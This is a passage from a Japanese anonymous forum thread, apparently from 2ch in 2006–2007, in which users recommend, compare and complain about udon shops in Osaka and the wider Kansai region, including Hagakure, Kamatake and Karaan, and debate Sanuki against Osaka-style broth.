240 :名無しさん@お腹いっぱい。:2006/09/15(金) 23:52:32 ID:KqRUwt9b
>>239
最近は本場よりも大阪のほうがレベル高いかもしんない。
唐庵は?

241 :名無しさん@お腹いっぱい。:2006/09/16(土) 02:53:48 ID:g65u9636
釜竹のメニューにはない「ぶっかけ」を、食べさせて頂いたことがあります。
激ウマだった! しかし、メニューにないものだから、もう二度と食べれないのが残念…

242 :名無しさん@お腹いっぱい。:2006/09/16(土) 03:26:57 ID:k2vmajMp
>>143

243 :名無しさん@お腹いっぱい。:2006/09/16(土) 03:45:17 ID:dGYYZXLf
>>240
おおーーなるほど!! 香川でうどん巡りした時のおか泉の味が忘れられなくて
唐庵ですか、早速、調べて行って見ます 情報ありっす!

ちなみに今日は更科行ってきました かーなり完成度の高いぶっかけだしますね
びっくりしました うどんもかなりうまいですが、てんぷらが異様な程うまかったです
なんで、人参のてんぷらがあんなに甘くておいしいのか不思議でした
いい店ですね



244 :名無しさん@お腹いっぱい。:2006/09/16(土) 15:08:36 ID:zRiaqqy7
>>240
マテ。いくらなんでもそこまでは…
確かに釜たけなどは美味いんだが。
はがくれで本場を越えたなんて言うとはw。

245 :名無しさん@お腹いっぱい。:2006/09/16(土) 20:10:23 ID:kdAgd4/I
イリコ味全開の出汁は好きになれないので
讃岐風関西うどんでいいや

246 :名無しさん@お腹いっぱい。:2006/09/16(土) 20:17:08 ID:KA1NBV8M
やはり魚系の出汁だけの讃岐はうどんはちょっと弱い。
昆布系の大坂出汁がないとつらい。

247 :名無しさん@お腹いっぱい。:2006/09/16(土) 22:23:29 ID:i0xoIb8b
梅のおうどんが( ゚Д゚)ウマー意

248 :名無しさん@お腹いっぱい。:2006/09/17(日) 00:14:21 ID:i95rsPzg
釜竹、はがくれ位のうどんで本場を越えたとは・・・讃岐の何処へ行ったんだ?
俺が行った谷川米穀・山越・はゆか等全くレベルが違う!
本当は讃岐へ行った事ないんじゃね〜か?

249 :名無しさん@お腹いっぱい。:2006/09/17(日) 00:56:36 ID:jYALSPfp
お前が食いに行ったのはいつだ?

讃岐信者はうざい

250 :名無しさん@お腹いっぱい。:2006/09/17(日) 02:38:09 ID:DfP25TYa
福増屋


251 :名無しさん@お腹いっぱい。:2006/09/17(日) 05:53:51 ID:SBPjCX5D
>>248
讃岐うどんもいい意味で有名になってからだいぶ経つし色々な都市に同じくらいの技量を持つ職人も増えたと思うよ。
材料にこだわってる店も増えてきてるしさ。その分本場よりコストパフォーマンスは高くなるってのが欠点か
まぁ、葉隠れは値段のわりに普通って感じだけどうどんを楽しむきっかけにはなると思うし。

本場云々も良いけど、もうちょっと色々と楽しむくらいの余裕もってもいいんじゃない?

252 :名無しさん@お腹いっぱい。:2006/09/17(日) 10:42:51 ID:0gPAROw0
山越は創価なので無条件却下w

253 :名無しさん@お腹いっぱい。:2006/09/17(日) 14:14:58 ID:Py+7+/K8
>248
釜武(かまたけ)と釜竹(かまちく)は別の店なので、間違えないようにね…

254 :宇鈍:2006/09/17(日) 20:38:50 ID:Al85iW7D
蔵十  旭区

255 :名無しさん@お腹いっぱい。:2006/09/18(月) 02:49:57 ID:BUEr4kFr
釜竹は釜揚げもざるも絶品だな!
店主の職人っぷりもさすがです。
私の中では関西一だよっ

256 :名無しさん@お腹いっぱい。:2006/09/18(月) 10:09:22 ID:Nme2Wyaa
>254

そういえば、京阪滝井駅前の某うどん屋さんの主人が、
なにげに蔵十の麺について批判してた。

257 :裸目ン:2006/09/18(月) 19:54:55 ID:t75C8M+/
>>256
場所がちとわかりにくい
けど、最高でつ

258 :名無しさん@お腹いっぱい。:2006/09/19(火) 00:57:09 ID:n8HNuK7R
>>256
大阪のうどん屋はいくつかの派閥に分かれてるからナ。
派閥間のけなしあいは見ていて凶悪だと思う。
逆に同派閥間での褒め方も大概ヒドイ。
どっちも工作員や信者がいてやり方が恐ろしく陰湿。

当の本人たちはかなり調子コイてるんで、
自分らがやってる事に全然気付いてないみたいだが。


ここにも常駐しているっぽいナ。
ご苦労なこった。

259 :名無しさん@お腹いっぱい。:2006/09/19(火) 01:10:41 ID:UrLq1Hut
>>255
空気嫁。書き方が激しく逆効果。

>>248
そんなに本場だけがいいの?もう少し視野を広げたら?
漏れだって昔は本場に通ったさ、毎月のように。
でも、最近は回数が年に1回ぐらいに減った。
理由は大阪でも美味しいお店が増えたから。
ああこれなら香川まで行く意味がもうあまりないなあって。

讃岐は最近、お店の浮き沈みが激しすぎる。

260 :名無しさん@お腹いっぱい。:2006/09/19(火) 20:41:45 ID:7VLoUwny
http://kasiwamov.com/gro/index.cgiおもしろいよ

261 :名無しさん@お腹いっぱい。:2006/09/21(木) 16:16:09 ID:93C4YYmz
他所の店の生姜には文句つけるが
自分の所で麺を学んだ店にはチュ-ブでも
べた褒め。

こんな奴のどこが職人だ。

262 :名無しさん@お腹いっぱい。:2006/09/21(木) 19:46:28 ID:xSNSaoDt
今月号のミーツリージョナルは麺特集だけど、
どんな内容でつたか?

263 :名無しさん@お腹いっぱい。:2006/09/21(木) 21:52:06 ID:ckxjg8Wc
>262

月刊じゃなくて、ミーツの増刊号な。

紹介されてたうどん屋

西田辺・ゆきの、上本町・皐月庵、道頓堀・今井、
錦市場・山茂登、黒門市場・あさひ、鶴橋・七福亭、
神戸中央市場・讃松庵、三宮・長野屋、四天王寺・前田、
京都・日の出うどん、中崎町・力餅食堂、玉出・力餅食堂、
四天王寺・志のん、天満橋・香月、あびこ・屋島、
西大路八条・幸、千日前・釜たけ、京橋・浪花、
平野町・美々卯、船場・うさみ亭マツバヤ、
守口滝井・>>256の店、池田・吾妻、北堀江・かすうどん山本2号店、
北新地・黒門さかえ、錦市場・冨美家、
大阪駅前1ビル・たかはた&つるつる庵、阪急三番街B2・兎麦、
北新地・つるとんたん、千日前・千とせ、千日前・信濃そば、
千日前・かす庵、祇園・おかる、祇園・権兵衛、
祇園・祇をん萬屋、三宮・雲南茶苑、北野田・やぶうち、
門真・讃岐一番、大和田・饂飩倉、枚方・釜盛、
八尾・一忠、羽曳野・釜竹

立ち食い系も網羅されている。
京都駅・麺家、大阪駅・シオヤ、京橋駅・にしき、
なんば・丸一屋

264 :名無しさん@お腹いっぱい。:2006/09/22(金) 00:43:46 ID:GuUhnrgF
>>261
kwsk

店名かソースを晒せる範囲で

265 :名無しさん@お腹いっぱい。:2006/09/22(金) 01:41:53 ID:0MX/pIEM
>>264
難波→梅田×
難波→MBS近く○

266 :名無しさん@お腹いっぱい。:2006/09/22(金) 22:20:56 ID:C/hFUHeH
釜竹は絶品だった!

267 :名無しさん@お腹いっぱい。:2006/09/22(金) 22:41:23 ID:PIJgpCGe
>>263
ああよかった。
お気に入りのお店が晒されてない。

268 :名無しさん@お腹いっぱい。:2006/09/22(金) 23:17:28 ID:vZFA4C/1
>263

ゆきのはおもいっきり晒されてたな。何ページにも渡ってw

269 :名無しさん@お腹いっぱい。:2006/09/24(日) 16:48:14 ID:i+rQStiv
今回、スマップが、食事した美々卯は、本店か、本町の所でしょうか?知ってる方居ませんか?

270 :名無しさん@お腹いっぱい。:2006/09/25(月) 03:42:11 ID:pVEiTTkr
阪急茨木商店街にあるタツミ屋っていう立ち喰いうどんおいしいで。もちろん立ち食いににしてはってレベルやけどな。

271 :神落:2006/09/25(月) 07:52:43 ID:OMlbEo8/
>>268
orz

272 :名無しさん@お腹いっぱい。:2006/09/27(水) 18:44:29 ID:2kS2qRRE
野田阪神の『やとう』の天ざるが一番好き☆

コシも喉越しもなめらかさもダシも天ぷらも最高!

香川は父親の実家なので、何度も行って食べまくったが、ココの方が美味いと思ってる。

こんな折れが、もっと感動してしまう、名店を教えて下さいなm(__)m

273 :名無しさん@お腹いっぱい。:2006/09/28(木) 00:17:16 ID:/DH302OQ
自分で探せよ工作員君

274 :名無しさん@お腹いっぱい。:2006/09/28(木) 09:39:33 ID:DyUjLnB6
>273

と書いてるが、
「( ゚Д゚)ウマー なうどん店情報キボソ」
なスレに出入りしているお前も、
心の中では「漏れも情報キボンヌキボンヌ」
って思ってんじゃないの?

275 :名無しさん@お腹いっぱい。:2006/09/28(木) 20:00:04 ID:nVUTebiV
>>274
あんまりいじめてやるな。
>>273はかわいそうな子なんだよ

276 :名無しさん@お腹いっぱい。:2006/09/28(木) 22:10:21 ID:Qtmnchrf
やとうで満足なら他の店に行かなくても
いいんじゃまいか?

277 :272:2006/09/29(金) 16:20:30 ID:aj4gQF4A
>>273
>>276

そんな寂しい事言わずに、もっと美味い店だと思う所を教えてちょ。

確かに満足なんだが、新しい発見もしたいねん。


ちなみに、うどんは温より冷で、歯ごたえを楽しむ物だと思ってる。

で、天ぷらが1番の具だと思ってて、ツユは甘いめのが好き。

以前、コシで1番良いと思ってた、岐阜の大垣にあった店は人気あったのに、跡取り居なくて閉店しちゃって、もう食べれない。
店長入院しちゃった。

あの感動をまた味わいたい。

278 :名無しさん@お腹いっぱい。:2006/09/29(金) 22:25:08 ID:uBCmzvlk
>>272
このスレを最初から読めば?
その読みにくい書き方やめてね。


279 :名無しさん@お腹いっぱい。:2006/10/01(日) 22:51:45 ID:DDiwi0ml
難波・心斎橋あたりで朝早くからやってるお店ありませんか?

280 :もも:2006/10/02(月) 04:40:10 ID:wbr8lvjW
やっぱり、ふるさと〜美味しいよ。

281 :名無しさん@お腹いっぱい。:2006/10/04(水) 01:44:11 ID:ivK4JbIl
大阪駅ビル:

はがくれ(いろんな意味で気に入らないが無視できない店であることには違いない)
たかはた(なんともいえないB級感のうどん)
うどん棒(駅ビルで一番王道のうどんを出す店)
めん次郎(めん次郎の名前の店は複数あるが、そのうち一軒だけが当たり他は地雷)

282 :名無しさん@お腹いっぱい。:2006/10/04(水) 03:35:11 ID:G1AeWm7g
俺は東梅田の地下にある“どんまる”が好き。

西宮のはがくれを喰った事あるけど、別にどうって事ないね。
やっぱり、うどんは立ち食いで充分や。

283 :名無しさん@お腹いっぱい。:2006/10/04(水) 18:53:24 ID:tMRB85cY
西宮までわざわざ行ったのに、なぜ梅八で喰わないんだ。
立ち喰いで十分というヤシに言っても仕方がないか。

284 :名無しさん@お腹いっぱい。:2006/10/04(水) 19:23:46 ID:qoMl2p6o
>281
「当たり」のめん次郎は、第4ビルB2階。
セガのゲーセンの目の前。
めん次郎の名のつくうどん屋が2件並んでるが、
「うどんづくし・めん次郎」(だったっけ?)の方が当たり。
(店内の壁に新聞のスクラップが貼られてるので、
すぐわかるはず)

なおもう一方の、無印の「めん次郎」の方は(ry

285 :名無しさん@お腹いっぱい。:2006/10/04(水) 22:12:24 ID:NQYTGH8x
空海には誰も触れないんだなwww
空海行く度に後悔するが。

286 :名無しさん@お腹いっぱい。:2006/10/04(水) 23:06:40 ID:NQYTGH8x
連投スマン
空海行って後悔するといっても
個人主観だから他の人が行って
うまいと思ってもそれは認める。

287 :名無しさん@お腹いっぱい。:2006/10/05(木) 01:18:41 ID:evgwaZrl
>>286
弱気やなwww

288 :名無しさん@お腹いっぱい。:2006/10/05(木) 06:51:53 ID:6FUvZ3+u
>>283
きつねうどんいくら?

289 :名無しさん@お腹いっぱい。:2006/10/05(木) 21:55:34 ID:sji5kYnP
>285-287
え?何?駄洒落じゃなかったの?

290 :名無しさん@お腹いっぱい。:2006/10/06(金) 00:50:41 ID:cvVbWpir
店の存在すら認識されてないのか。
空海カワイソス

>>288
283ではないが確か550円〜600円のはず

291 :名無しさん@お腹いっぱい。:2006/10/06(金) 08:53:06 ID:DL6DFjA+
>>290
そんなに高くないね

292 :名無しさん@お腹いっぱい。:2006/10/06(金) 10:23:23 ID:UMJ97i+T
その手は弘法大師

293 :272:2006/10/12(木) 12:17:00 ID:ZkzEQMCN
読み難い人はスルーしてね。

話題の唐庵が未体験だったので、行ってきますた。

一回目は閉店一時間前だったけど玉切れで、玉砕。

二回目は、閉店二時間前に行ったら20分待ちだったけど、何とか食べる事が出来た。

まず、うどんの前におでんを食べてみた。
(゚д゚)ウマー
よくダシが浸みてます!

次は、天ざるうどん。
海老天がとにかくデカイ!
圧巻!素晴らしい!
頭から尻尾まで、バリバリ食べました!
(゚д゚)メチャウマー

うどんは、まぁまぁ。
ダシも、まぁまぁ。もうちょい甘いのが好みだが、讃岐に比べたらよくできてる。つづく

294 :名無しさん@お腹いっぱい。:2006/10/12(木) 12:31:29 ID:ZkzEQMCN
つづき


カレーうどんの香りも良くて気になったけど、今回はスルー。

帰りに見たら、おでんも完売やった。


個人的に、うどんのコシがもっとあって、ダシがもっと甘いなら、最高だったが、あくまで好みの問題。
イイ店やね。


今度はカレーうどんに挑戦しに行きます!


海老天最高!o(^-^)o

295 :名無しさん@お腹いっぱい。:2006/10/13(金) 01:04:37 ID:msA6jrbh
1年ぶりに、は○くれに行ってきた。温かい釜玉うどんを注文したのだが、麺はコシがなくぬるかった。
これまで全ておいしかったけど、はっきり言って今回かなりがっかりした。
麺をゆでて置いてあったんだろうか・・?最近のは○くれ釜玉うどんについて、情報キボン。


296 :名無しさん@お腹いっぱい。:2006/10/13(金) 07:58:30 ID:xvLUMECF
〇が〇〇は当たりはずれが大きいからな。


297 :名無しさん@お腹いっぱい。:2006/10/13(金) 16:49:43 ID:fcaFyJ8v
最近行ってないな
はがくれ●質が落ちたのか
残念だな

298 :名無しさん@お腹いっぱい。:2006/10/13(金) 16:57:30 ID:6V3zauRr
拾銭

299 :名無しさん@お腹いっぱい。:2006/10/15(日) 01:29:23 ID:7dbgPelw
個人的に難波亭なんか良いと思うんだがこのスレ的にはどうなん?

300 :名無しさん@お腹いっぱい。:2006/10/15(日) 15:40:55 ID:Uav0SmmD
300

301 :名無しさん@お腹いっぱい。:2006/10/16(月) 19:14:14 ID:z2Vz91DG
は●くれでおつり間違えられたorz

302 :名無しさん@お腹いっぱい。:2006/10/17(火) 00:48:22 ID:2gq8GRg6
お釣りを間違うような料金体系じゃないのにww

303 :名無しさん@お腹いっぱい。:2006/10/20(金) 03:15:43 ID:OtSS4n+r
はがくれにいったがコシは弱いし風味ももうひとつで量も少なかった。
大盛り無料って店は麺の量が少ないことが多いな。
はがくれのオッサンはいちいち五月蝿い。誰か黙らせてくれ

304 :名無しさん@お腹いっぱい。:2006/10/20(金) 21:43:15 ID:17DyRDAc
デパートやったらどこが旨い?

305 :名無しさん@お腹いっぱい。:2006/10/21(土) 02:13:21 ID:NiW2kZCZ
〇が〇〇は金儲けと名誉の為の店だからナ。
ちょいと前までは良心的だったが、スポットライトを浴びるようになってからおかしくなった。
まぁよくある話だがナ。

雑誌に何度も載るような店に味を求めるのがそもそもの間違い。

306 :名無しさん@お腹いっぱい。:2006/10/21(土) 02:34:42 ID:JngcO76s
枚方・釜盛は最高に旨いが、
16時頃憑くと数時間前に揚げたと思われる天ぷらが出てくる
これはイカンザキ

307 :名無しさん@お腹いっぱい。:2006/10/22(日) 17:00:06 ID:dxlL7Y+E
門真の讃岐一番がお気に入りです。
店内がセルフの讃岐仕様ですね。麺のコシもあって満足。


308 :名無しさん@お腹いっぱい。:2006/10/23(月) 01:30:54 ID:hRaHUL4y
教えて下さい。

昔懐かしい甘い出汁のうどん屋さん、どこかに
ありませんか?よろしくお願いします。

309 :名無しさん@お腹いっぱい。:2006/10/23(月) 09:58:43 ID:k0UWMC4n
つ 力餅

310 :名無しさん@お腹いっぱい。:2006/10/24(火) 02:51:53 ID:qlIdzI3n
>>309
力餅ですか?前の「つ」は関係ないですか。
ありがとうございます。でも、
力餅の出汁とも違うんですぅ。

311 :名無しさん@お腹いっぱい。:2006/10/24(火) 14:53:07 ID:NUb6e6WS
豊中、庄内、176沿いの交番の斜め前のうどん屋ベリー馬。

312 :名無しさん@お腹いっぱい。:2006/10/25(水) 02:19:50 ID:wIbhdvnu
ありがとうございます。一度いってみます。

313 :名無しさん@お腹いっぱい。:2006/10/25(水) 19:04:44 ID:UOuh+Ngm
確かにはがくれは味が落ちたな。
それでも生醤油に限ったら大阪じゃまだ一番うまいよ。

314 :名無しさん@お腹いっぱい。:2006/10/26(木) 01:39:47 ID:RYKuIR/P
マジではがくれ、美味しいと思わないんですよねえ。
他のうどん屋と変わらない。わたしが麺より出汁を重視するからかな。

315 :名無しさん@お腹いっぱい。:2006/10/26(木) 02:32:28 ID:YrKqnPlF
香川出身だがなか卯でいいんじゃない?
値段も安いし。
まぁ讃岐うどんのよさは値段だよ安さ。
一杯小なら100円、中でも150円だからね。
いくら旨いといってもうどんなんかに500円以上出すやつは馬鹿じゃないかと。


316 :名無しさん@お腹いっぱい。:2006/10/26(木) 18:54:59 ID:AhTRK6L0
>>313
私もそう思ってましたが、こないだ唐庵で生じょうゆを
食って考えが変わりました。いっぺん行ってみて^^

317 :名無しさん@お腹いっぱい。:2006/10/26(木) 20:32:53 ID:T0sROfkE
現地も含めて色んな讃岐うどんを食べたけど、はがくれの麺は讃岐うどんとはちょっと違う気がする


318 :名無しさん@お腹いっぱい。:2006/10/27(金) 17:16:56 ID:hhLpFUc7
梅田のはがくれに行くのなら、
同じ第3ビル内の「うどん棒」か、
隣の第4ビルの「うどんづくし めん次郎」
がオシシメ。

319 :名無しさん@お腹いっぱい。:2006/10/27(金) 21:02:41 ID:9zR6FlPq
うどんの喜らく。きらく定食がかやく定食になってた。
昆布うどんとかやくごはんのセットのうどんにあげさんがついて
かやく定食、650円。
前のままでよかったと思うのは私だけではないはず。

http://www.kiraku-g.co.jp/contents/udonkiraku.htm

320 :名無しさん@お腹いっぱい。:2006/10/28(土) 02:48:32 ID:LKCb5izz
お〜い!福島の力餅つぶれてるやん!

321 :名無しさん@お腹いっぱい。:2006/10/28(土) 17:02:51 ID:/XZbJLdp
ああ!大阪の柔らかな煮込みうどんが食いたい。
東京のうどんは矢田矢田矢田

322 :名無しさん@お腹いっぱい。:2006/10/29(日) 18:24:29 ID:lWVGVawO
>>315
激しく同意するが
ここでそれを言うと議論するネタがなくなる

讃岐うどんのもっちり感と関西の出汁のこだわりが
組み合わさったのが関西流のさぬきうどんと思ってる。

323 :名無しさん@お腹いっぱい。:2006/11/06(月) 15:37:26 ID:ZY9aVK/g
確かに、なか卵やセルフの美味くて安い店が増えたよね。

天神橋筋商店街の南森町駅南側のだるまの絵のうどん屋さん、かけ100円にしては美味い。

普段の一人外食なら、あれで十分。

324 :名無しさん@お腹いっぱい。:2006/11/06(月) 17:17:00 ID:CRGzpnRs
なか卵を安いといえるかどうかは微妙

325 :名無しさん@お腹いっぱい。:2006/11/07(火) 19:52:09 ID:2HpeRQ01
>>323
だるま堂だね
そこから梅田方向に5分くらい歩いたセルフうどんの店も結構イケるよ
ひよしなんとかって店

326 :名無しさん@お腹いっぱい。:2006/11/10(金) 00:42:02 ID:Mvp8VbGS
豊崎でたけうちうどんと讃州でおK。
たまにうどん棒と麺次郎のうどん屋。

327 :名無しさん@お腹いっぱい。:2006/11/10(金) 11:46:03 ID:GTtBO59K
>326
どっちもぶっかけ食ったけど
たけうちは好きだが讃州は微妙とおもた
讃州でウマイの何??



328 :名無しさん@お腹いっぱい。:2006/11/10(金) 23:50:35 ID:Mvp8VbGS
>>327
讃州のうどんが合わなかったか。
温い汁系かざるチャーシュー。
それでも駄目ならおでんと夜メニュー牛すじポンズをあてに一杯。
後は弥七かたけうちで。

329 :名無しさん@お腹いっぱい。:2006/11/11(土) 19:33:36 ID:x2GB9PQ6
>>328
釜たけ風の麺が好きなんで、麺がモチっとしてなかったのと
なんかぶっかけの出汁が薄く感じたのが自分には合わんかったんかなと…
あと、昼の一番混んでた時間にいったんで
タイミングをミスったせいかなぁとも思ったんですけど…
今度、あったかい系食べてみます。

330 :323:2006/11/14(火) 16:43:41 ID:Kv9y6MUz
>>325

亀レスだが、さんくす。

近々、トライしてきます!

331 :名無しさん@お腹いっぱい。:2006/11/15(水) 18:44:14 ID:g/evsaRZ
関西うどんいいよね〜つゆは関西が一番上手い
うどんは関西、讃岐がうまい

332 :名無しさん@お腹いっぱい。:2006/11/16(木) 19:53:10 ID:sNwCs+ds
羽曳野の釜竹で食ってきた。
期待ハズレだった。全然うまくない。
出汁は薄いし、うどんにコシもない。
席の案内の仕方もおかしい。席がたくさん空いてるにも
関わらず同じ席に座らせようとする。食べ終わった客には
「早く帰れ」と言わんばかりに器を片付ける。
味でも接客でもイメージが悪い。二度と行かないと思う。

333 :☆彡29:2006/11/19(日) 01:57:29 ID:PN+UXJly
333

334 :名無しさん@お腹いっぱい。:2006/11/20(月) 14:54:51 ID:+GzGnaP/
住之江区の『丸亀』まぁまぁ美味いよ!

335 :名無しさん@お腹いっぱい。:2006/11/21(火) 20:50:03 ID:xqagmynM
はびきの釜竹

336 :名無しさん@お腹いっぱい。:2006/11/23(木) 23:20:48 ID:x0iCNFDT
千日前の釜たけうどん、めっちゃ好き。ああいう系統のお店でどっか知らない?

太麺でコシあって・・・って感じの。

337 :名無しさん@お腹いっぱい。:2006/11/26(日) 21:37:35 ID:qMOfZArh
門真の讃岐一番はどう?

338 :名無しさん@お腹いっぱい。:2006/11/27(月) 23:40:27 ID:G5KnQDeC
門真なら更科やろ!

339 :名無しさん@お腹いっぱい。:2006/11/28(火) 10:03:50 ID:rPw9XADC
JR甲子園口近くの店なんやけ『花林』花林うどん、うまかったっす!\(~o~)/

340 :名無しさん@お腹いっぱい。:2006/12/04(月) 09:41:45 ID:vrjJvz/i
↑わいは、煮込みうどん やな

341 :名無しさん@お腹いっぱい。:2006/12/07(木) 02:54:21 ID:EVOJeHFI
心斎橋の駅降りて大丸とそごうの間の道を東へ3分ぐらい歩いた所にある
「てなもんや」というお店は凄くおいしかったですよ。
最初かわふくへ行こうと思ってたんですけどお昼時で満席だったので行ってみたら
びっくりしました。
座席数とか雰囲気とかはこじんまりしてるのにマジうまです。


342 :名無しさん@お腹いっぱい。:2006/12/08(金) 00:22:18 ID:UFVr4WNP
七福亭の天カレー食った
ネットで絶賛されてたけどそんなに美味しいかな
カレーが薄かった
一緒に行った連れは麺が柔らかすぎるって言ってた

343 :名無しさん@お腹いっぱい。:2006/12/10(日) 09:18:24 ID:fsaqxHEN
>>342
連れは女?

344 :名無しさん@お腹いっぱい。:2006/12/10(日) 11:22:39 ID:va8oObxh
讃岐うどんの宇治田原のたなか
旨い


345 :名無しさん@お腹いっぱい。:2006/12/10(日) 13:09:30 ID:1stGvDdI
>>343
女は太さより堅さにこだわる、っていうしな。

346 :名無しさん@お腹いっぱい。:2006/12/14(木) 10:40:02 ID:HEk1hiNX
>>344
旨いが、電車、車のアクセスが微妙←そこが魅力でもあるのだが
そして何よりも今月20日で一旦閉店だ。

347 :名無しさん@お腹いっぱい。:2006/12/15(金) 21:57:35 ID:PhF9wmqX
特急が淡路駅にも停車 阪急京都線、来春ダイヤ改定へ
http://www.asahi.com/kansai/news/OSK200612150063.html

阪急電鉄は15日、来年3月に京都線のダイヤを4年ぶりに改定すると発表した。
日中の特急が新たに淡路駅にも停車、千里線や大阪市営地下鉄堺筋線方面への乗り継ぎを便利にする。
日中の急行をやめて「準急」を新設、従来の急行停車駅に南方、上新庄駅を加え、運転時間帯を朝と夕方、夜にも拡大する。
また、朝夕に運転していた快速特急を廃止、平日朝の通勤特急を新たに長岡天神、桂、西院にも停車させ、時間帯を平日夕方にも広げる。
改定に合わせて、京都・河原町から大阪・梅田までは通勤特急で47分と現行より約1分短縮、快速急行で49分と約9分短縮される。

348 :名無しさん@お腹いっぱい。:2006/12/18(月) 00:52:53 ID:9TDuBb3f
揚げ

349 :名無しさん@お腹いっぱい。:2006/12/23(土) 02:47:51 ID:ghgjcRpo
かすやのかすうどんうまー

350 :名無しさん@お腹いっぱい。:2006/12/23(土) 06:34:13 ID:gSnI9hmt
今里で何処が美味いすか?

351 :名無しさん@お腹いっぱい。:2006/12/23(土) 16:32:51 ID:0QWIo/YT
自分は都島区のマルエーでいいです。
ばあちゃんの炊くかやくごはんの定食。
毎日行っても飽きない、何の変哲も無いまちのうどん屋です。

352 :名無しさん@お腹いっぱい。:2006/12/23(土) 20:10:57 ID:1jmjbuUg
いまのらや石切店の前に救急車止まってるんだが
何かあったの?
のらやでノロ?なんてシャレでもきけないし


353 :名無しさん@お腹いっぱい。:2006/12/23(土) 20:18:41 ID:1jmjbuUg
いま救急車走り去っていった
今日は喰うのやめとこ

354 :名無しさん@お腹いっぱい。:2006/12/30(土) 19:52:55 ID:BJWxmYZC
お化けの救急車〜

355 :名無しさん@お腹いっぱい。:2007/01/08(月) 21:22:12 ID:tqv0Qqxt
「意義大きい西大阪線の延伸」「キタ・ミナミ活性化に一役」
http://www.sankei-kansai.com/02_keizai/kei010701.htm


356 :名無しさん@お腹いっぱい。:2007/01/11(木) 10:44:44 ID:cL0R/SN3
立ち食いですが、ミナミの松屋おいしかった。


357 :名無しさん@お腹いっぱい。:2007/01/13(土) 17:24:29 ID:DM0uVhyE
福島のとあるオフィス街の近くの老舗蕎麦屋、食器と食器の間にGほいほいがたくさん置いてあって、毎朝たくさんひっかかってるんだじょ
たまに炊飯窯の中に足が入ってたし、土足の汚い床に落ちた海老そのまま天ぷらにしてたじょ

358 :名無しさん@お腹いっぱい。:2007/01/21(日) 17:44:25 ID:bnu/0iEY
堺市の岩室にある土佐がうまい


359 :名無しさん@お腹いっぱい。:2007/01/26(金) 11:27:40 ID:NgH8jJ7v
( ^ω^)
かき台抜き
やなぎ名物の台抜きの「かつ」を「カキフライ」でとじた季節の絶品の商品です
880円
( ^ω^)「かつ」を「カキフライ」でとじる・・・?
( ^ω^ ) ・・・




360 :名無しさん@お腹いっぱい。:2007/01/29(月) 14:56:49 ID:2yacFCM8
セルフ讃岐本舗 うどんぐら(UDON GURA)
まぁまぁうまいんじゃないの?

361 :名無しさん@お腹いっぱい。:2007/01/31(水) 13:29:31 ID:uMrlrqIk
カレーうどん「得正」上五店…最悪...orz

362 :名無しさん@お腹いっぱい。:2007/01/31(水) 16:04:01 ID:3a8XPwMF
千日前松屋もよろしく

363 :名無しさん@お腹いっぱい。:2007/02/02(金) 03:46:13 ID:xcX3U8Ei
カリーうどんなら若鯱家がうまかったな

364 :名無しさん@お腹いっぱい。:2007/02/02(金) 23:24:23 ID:lZtDTBkt
谷九のふる里

365 :名無しさん@お腹いっぱい。:2007/02/04(日) 03:10:33 ID:kqwIejLp
有名やけどはがくれかな。

366 :名無しさん@お腹いっぱい。:2007/02/04(日) 12:32:39 ID:HeerHtYf
はがくれは麺だけだろ。

367 :名無しさん@お腹いっぱい。 :2007/02/06(火) 16:04:48 ID:DOMt0/7t
おっさんがごちゃごちゃ言わんかったら、まあ食べられる麺やが

368 :名無しさん@お腹いっぱい。:2007/02/07(水) 01:52:56 ID:Y1o94LDf
釜玉って汁あれへんからすぐ食い終わってまうな。
はがくれだと値段変わらんし大盛りにしてる。
と言うか大盛りにせんと割り合わん・・・

369 :名無しさん@お腹いっぱい。:2007/02/12(月) 18:27:18 ID:8/IMgaoI
西宮北IC東のいわしやで食ってきた。
うどんも旨いが、100円の鳥天のコスパ良すぎ。
今日は、しょうゆ冷大(300+100)・卵天(80)・鳥天(100)で580円。

370 :名無しさん@お腹いっぱい。:2007/02/20(火) 12:11:18 ID:zadvjvTo
【食品】大阪うどん復権へ「讃岐」には負けへんで 老舗の麺業者、新商品を開発[02/20]
http://news21.2ch.net/test/read.cgi/bizplus/1171926695/

371 :名無しさん@お腹いっぱい。:2007/02/20(火) 17:42:10 ID:XMEbsUIl
蕎麦の話題もここで良いですか?
大阪市内もしくは大阪北部で茶蕎麦を出す店を探しています。
茶蕎麦のカレー南蛮が食べたいのです。
もしくはうどんでも構わないのですがカレーがスパイシーではなく
かなりマイルド、甘口(かといって得正のようではなく色も薄め)の店はありますか。
スパイス少な目で本当にただのカレー粉を出汁で溶いただけのようなのを探しています。
お心当たりありましたらよろしくお願いします。

372 :名無しさん@お腹いっぱい。:2007/02/20(火) 21:53:32 ID:kCxhY29V
すごい飛び道具登場だな。

373 :名無しさん@お腹いっぱい。:2007/02/25(日) 14:45:00 ID:m9BQiLGm
>>371
自分で作れるんじゃね?

374 :名無しさん@お腹いっぱい。:2007/02/27(火) 19:03:39 ID:Y0Wknl70
カレー蕎麦って案外少ないよな。

カレーに蕎麦の微妙な風味が消されるから、玄人好みでは無いんだろうけど、普通に美味いよな。

375 :名無しさん@お腹いっぱい。:2007/02/27(火) 22:55:17 ID:8elawwwh
>>373
それが意外と作れないんです。
以前そんなカレー茶蕎麦を出してた店があったのですが閉まってしまい
それから似た味を探し続けてるんだけど見つからなくて。
まず茶蕎麦を食べさせる店自体ほとんど無く
カレーうどんはあっても蕎麦は無かったりすることもあり。
しかも最近は妙にスパイシーなカレーうどんが主流ですよね。
昔ながらの蕎麦屋のカレーって少なくなっちゃった気がします。

376 :名無しさん@お腹いっぱい。:2007/02/28(水) 18:20:23 ID:9dd2HWeh
先日、待望の初はがくれに行きました。
ぶっかけを頼んで楽しみに待ってまして
出されたお茶を飲みほしてしまい
店員に頼んでいいのかどうか迷い自分でお茶を注いだ次第
すると、おっちゃんが『言うてくれたらええがな、そんな安もんの店ちゃいまっせ』と軽いジャブ。
いよいよ自分のところにぶっかけうどんが提供される件になり
『兄ちゃん前来たことあるやろ?』
『いえ、初めてです』
『ほな、おっちゃんが作ってやるさかい』
ということで、すべておまかせし、いよいよ食べようとしたところ
『うどんを2本だけつまんでみ』と言われ
言われるがままに、2本つまんで口に運んで待望のはがくれうどんを食しました。
確かに美味かったです。
その後食べ進んだ際に、かき混ぜたところ
『兄ちゃん、かき混ぜたらあかんわ』とクレーム
『かき混ぜたらネバネバになってまうがな』と言われ
何故か“すんません”とお金を払ったお客が恐縮しつつ
すだちの種を払いながら無事に完食。
『美味しかったです、ご馳走様でした』と言って
店を去るも、おっちゃんは

“一切無視”

何も言わへん。
かき混ぜたことが、許せなかった模様。

しかしだね、かき混ぜようとどうしようと
